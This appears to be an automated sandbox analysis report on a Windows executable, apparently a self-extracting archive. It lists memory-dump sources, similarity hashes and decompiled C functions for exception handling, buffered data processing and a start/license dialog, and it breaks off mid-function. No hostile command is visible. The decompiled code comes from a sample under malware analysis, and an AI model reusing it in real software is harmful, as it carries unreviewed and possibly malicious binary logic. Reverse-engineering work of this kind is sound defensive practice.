              0x00d7844e
              0x00d7844e
              0x00d78451
              0x00000000
              0x00000000
              0x00d78457
              0x00d7845e
              0x00000000
              0x00000000
              0x00d78469
              0x00d7846a
              0x00d7846e
              0x00d7846f
              0x00d78470
              0x00d78475
              0x00d78477
              0x00d7848c
              0x00d7849d
              0x00000000
              0x00d78479
              0x00d78480
              0x00000000
              0x00d78480
              0x00d78477
              0x00d78431
              0x00d78438
              0x00000000
              0x00d7843e
              0x00d78449
              0x00000000
              0x00d78449
              0x00d78438
              0x00d783f5
              0x00d78413
              0x00d78413
              0x00000000
              0x00d78413
              0x00d783f7
              0x00d783f8
              0x00d783fc
              0x00d783fd
              0x00d78405
              0x00d7841a
              0x00d7841a
              0x00000000
              0x00d78407
              0x00d7840e
              0x00000000
              0x00d7840e

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: 32cbd20edab577f7428e1d412d5836f8e58b99c63c93a65e739b31af309d3061
              • Instruction ID: a1cbf89d9dfff0d613da0e09ade723e7165bb1eb18f56b153c06e125fc2abefc
              • Opcode Fuzzy Hash: 32cbd20edab577f7428e1d412d5836f8e58b99c63c93a65e739b31af309d3061
              • Instruction Fuzzy Hash: E4820A71944185AEDF15DF64C889BFABBA9AF05300F0CC1BAE84D9B142FB319A44DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8E643, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8E643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00D8E64F); // executed
				return _t1;
			}




              0x00d8e648
              0x00d8e64e

              APIs
              • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,00D8E084), ref: 00D8E648
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 055bc870002aaaec68917baf899f288a79da82443e1da98a9c02f11fc56d5c14
              • Instruction ID: e98795968bbbafa5f2342fda2bf15fb7356e601b5194e2995aadcc0d918c99b9
              • Opcode Fuzzy Hash: 055bc870002aaaec68917baf899f288a79da82443e1da98a9c02f11fc56d5c14
              • Instruction Fuzzy Hash:
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8626D, Relevance: .3, Instructions: 325COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 98%
              			E00D8626D(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E00D82A7F(__ecx, __edx); // executed
				E00D842D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E00D8EA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_push(0x00400000 - _t263 & 0xfffffff0);
					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
					_t161 = E00D7C70F();
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E00D7A4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E00D833D3(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E00D8045D( *((intOrPtr*)(_t216 + 0x14)), E00D86CAC, _t232);
											} else {
												E00D866A2(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00D80697( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00D86CDB(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00D82E2C(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00D90E40(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E00D8EA80(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00D90E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E00D847DA(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E00D8EA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}










































              0x00d86277
              0x00d86279
              0x00d86287
              0x00d8628f
              0x00d86293
              0x00d86295
              0x00d86297
              0x00d86297
              0x00d8629a
              0x00d862a0
              0x00d862a1
              0x00d862a6
              0x00d862b0
              0x00d86297
              0x00d862bf
              0x00d862cf
              0x00d862d8
              0x00d862df
              0x00d862e2
              0x00d862e4
              0x00d862e8
              0x00d862ea
              0x00d862ee
              0x00d862f2
              0x00d862f6
              0x00d862f6
              0x00d86302
              0x00d86308
              0x00d86309
              0x00d8630e
              0x00d86314
              0x00000000
              0x00000000
              0x00d8631a
              0x00d8631c
              0x00d86320
              0x00d86328
              0x00000000
              0x00d8632e
              0x00d86334
              0x00000000
              0x00d8658a
              0x00d8633e
              0x00d86340
              0x00d86344
              0x00d86348
              0x00d86348
              0x00d8634a
              0x00d86350
              0x00d86354
              0x00d86354
              0x00d86356
              0x00d86359
              0x00d8635b
              0x00d8635f
              0x00d86366
              0x00d86368
              0x00d8637b
              0x00d86380
              0x00d86388
              0x00d8638b
              0x00d8638b
              0x00d8638f
              0x00d86392
              0x00d86398
              0x00d8639e
              0x00d863a4
              0x00d863a7
              0x00d863aa
              0x00000000
              0x00d863aa
              0x00d8636a
              0x00d8636a
              0x00d863ae
              0x00d863ae
              0x00d863b3
              0x00d863bd
              0x00d863c3
              0x00d863c7
              0x00d863cd
              0x00d86400
              0x00d86400
              0x00d86405
              0x00d86416
              0x00d86416
              0x00d8641d
              0x00d86407
              0x00d86407
              0x00d8640e
              0x00000000
              0x00d86410
              0x00d86410
              0x00d86410
              0x00d8640e
              0x00d86425
              0x00d86432
              0x00d86434
              0x00d86437
              0x00d8643b
              0x00d8643b
              0x00d8643d
              0x00d86441
              0x00d86449
              0x00d86449
              0x00d8644e
              0x00000000
              0x00000000
              0x00d86443
              0x00d86443
              0x00d86447
              0x00000000
              0x00000000
              0x00d86447
              0x00d863cf
              0x00d863d2
              0x00d863d6
              0x00d863dc
              0x00d863dd
              0x00d863e2
              0x00d863e4
              0x00d8645f
              0x00d8645f
              0x00d863e6
              0x00d863e6
              0x00d863ea
              0x00d863f5
              0x00d863f5
              0x00d863f9
              0x00000000
              0x00d863ec
              0x00d863ec
              0x00d863f3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d863f3
              0x00d863ea
              0x00d863e4
              0x00d863cd
              0x00000000
              0x00d86450
              0x00d86453
              0x00d86455
              0x00d86455
              0x00d8645d
              0x00d86464
              0x00d86464
              0x00d8646a
              0x00d8646f
              0x00d86471
              0x00d86473
              0x00d86475
              0x00d86475
              0x00d86475
              0x00d86476
              0x00d86478
              0x00d8647a
              0x00d8647c
              0x00d8647e
              0x00d86482
              0x00d86482
              0x00d86488
              0x00d8648c
              0x00d86490
              0x00d86494
              0x00d86496
              0x00d86499
              0x00d8649b
              0x00d8649e
              0x00d864a0
              0x00d864a2
              0x00d864a4
              0x00d864a4
              0x00d864a6
              0x00d864ab
              0x00d864ae
              0x00d864c3
              0x00d864b0
              0x00d864b3
              0x00d864b3
              0x00d864cc
              0x00d864ce
              0x00d864d2
              0x00d864d6
              0x00d864d6
              0x00d864dc
              0x00d864dc
              0x00d864e0
              0x00d864e4
              0x00d864e6
              0x00d86641
              0x00000000
              0x00d864ec
              0x00d864ef
              0x00d864f6
              0x00d864fa
              0x00d864fc
              0x00d86568
              0x00d86568
              0x00000000
              0x00d864fe
              0x00d864fe
              0x00d864fe
              0x00d86500
              0x00d86503
              0x00d86505
              0x00d8650c
              0x00d86527
              0x00d8652a
              0x00d8652f
              0x00d86531
              0x00000000
              0x00000000
              0x00d8650e
              0x00d86511
              0x00d86516
              0x00d86518
              0x00d8651e
              0x00d86525
              0x00d86537
              0x00d86537
              0x00d8653e
              0x00d86544
              0x00d8654b
              0x00d865a2
              0x00d865a7
              0x00d865aa
              0x00d865ac
              0x00d865b2
              0x00d865b9
              0x00d865bd
              0x00d865c5
              0x00d865cb
              0x00d865ce
              0x00d865d2
              0x00d865d9
              0x00d865dd
              0x00d865e4
              0x00d865e6
              0x00d865e8
              0x00d865fe
              0x00d86606
              0x00d8660f
              0x00d86613
              0x00d86619
              0x00000000
              0x00d86619
              0x00000000
              0x00d865e6
              0x00d8654d
              0x00d8654d
              0x00d86551
              0x00d86597
              0x00d86599
              0x00d8656c
              0x00d8656c
              0x00d8656e
              0x00d86574
              0x00d86578
              0x00d8657a
              0x00d86580
              0x00d8662b
              0x00d8662d
              0x00d8662f
              0x00d86623
              0x00d86623
              0x00d86625
              0x00d86645
              0x00d86645
              0x00d8664a
              0x00000000
              0x00000000
              0x00d86631
              0x00d8663a
              0x00d86620
              0x00d86620
              0x00000000
              0x00d86620
              0x00d8662f
              0x00d86586
              0x00d86586
              0x00000000
              0x00d86586
              0x00d86580
              0x00000000
              0x00000000
              0x00000000
              0x00d86551
              0x00d8654b
              0x00000000
              0x00000000
              0x00000000
              0x00d86525
              0x00d86518
              0x00000000
              0x00d86553
              0x00d86557
              0x00d8655d
              0x00d8655e
              0x00d86562
              0x00d86562
              0x00000000
              0x00d86500
              0x00d864fc
              0x00000000
              0x00d864e6
              0x00d86592
              0x00000000
              0x00d86334
              0x00d86328
              0x00000000
              0x00d86320
              0x00d86650
              0x00d86658
              0x00d8665b
              0x00d86660
              0x00d8666e
              0x00d86673
              0x00d86681
              0x00d8669f

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: c77df1a97cdb816a99e7c1c74767ac5885362a8f7210e225e335401f5152acdd
              • Instruction ID: 3a62e59d56074c6dd095a41179b944abb277afc35a3639436202f5a585aca925
              • Opcode Fuzzy Hash: c77df1a97cdb816a99e7c1c74767ac5885362a8f7210e225e335401f5152acdd
              • Instruction Fuzzy Hash: 6CD129B16083418FDB14EF28C88575BBBE4FF95318F08056DE8849B642D734E958CBB6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8A5D1, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E00D8A5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E00D8D870(E00DA14F6, _t321);
				E00D8D940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E00D712D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E00D8C343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0xdbb704;
						_t277 = 1;
						 *0xdb75d8 = _t302;
						 *0xdb75c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xdc5d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00D895F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0xdb9602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
						_t286 = 0xdb9602;
						if( *0xdb9602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E00D89A32(_t308); // executed
						_push(0xdb75e4);
						_push(0xdb75e0);
						_push(0xdcce18);
						_push(_t302);
						 *0xdb75d6 = 0; // executed
						_t114 = E00D89EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xdb75d1 = _t277;
						}
						__eflags =  *0xdb75e4;
						if( *0xdb75e4 > 0) {
							_push(7);
							_push( *0xdb75e0);
							_push(_t302);
							E00D8B4C7(_t299);
						}
						__eflags =  *0xdcde20;
						if( *0xdcde20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E00D7DA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E00D7DA42(_t286, 0xbe));
						}
						__eflags =  *0xdb75e4;
						if( *0xdb75e4 <= 0) {
							L103:
							__eflags =  *0xdb75d6;
							if( *0xdb75d6 != 0) {
								L114:
								__eflags =  *0xdb95fc - 2;
								if( *0xdb95fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0xdb85f8;
								if( *0xdb85f8 != 0) {
									E00D71294(_t302, 0x67, 0);
									E00D71294(_t302, 0x66, 0);
								}
								_t115 =  *0xdb95fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xdb75d7;
									if( *0xdb75d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0xdadf38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xdb75d1;
								if( *0xdb75d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E00D7DA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xdcce0c;
							if( *0xdcce0c != 0) {
								goto L114;
							}
							__eflags =  *0xdb95fc;
							if( *0xdb95fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E00D7FA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E00D7FA89(__eflags, _t321 - 0x9688, E00D7DA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0xdcde20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xdcde20;
								if( *0xdcde20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0xdb75e8; // 0x0
							E00D88FE6(_t286, __eflags,  *0xdb0064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0xdb75e0);
							_push(_t302); // executed
							E00D8B4C7(_t299); // executed
							_t133 =  *0xdcce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xdb95fc;
								if(__eflags == 0) {
									_t288 =  *0xdb75e8; // 0x0
									E00D88FE6(_t288, __eflags,  *0xdb0064,  *(_t321 + 0x14), _t133, 0, 0);
									L00D92B4E( *0xdcce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0xdb95fc - _t277;
							if( *0xdb95fc == _t277) {
								L102:
								_push(_t277);
								_push( *0xdb75e0);
								_push(_t302);
								E00D8B4C7(_t299);
								goto L103;
							} else {
								 *0xdadf3c(_t302);
								__eflags =  *0xdb95fc - _t277;
								if( *0xdb95fc == _t277) {
									goto L102;
								}
								__eflags =  *0xdb9601;
								if( *0xdb9601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xdb75e0);
								_push(_t302);
								E00D8B4C7(_t299);
								__eflags =  *0xdcde18;
								if( *0xdcde18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xdb0064, L"LICENSEDLG", 0, E00D8A3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xdb75d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xdb75d0;
						if( *0xdb75d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0xdb75d0;
							if( *0xdb75d0 == 0) {
								__eflags =  *0xdb75d1;
								if( *0xdb75d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0xdb75cc;
									_t279 = _t152;
									if( *0xdb75cc == 0) {
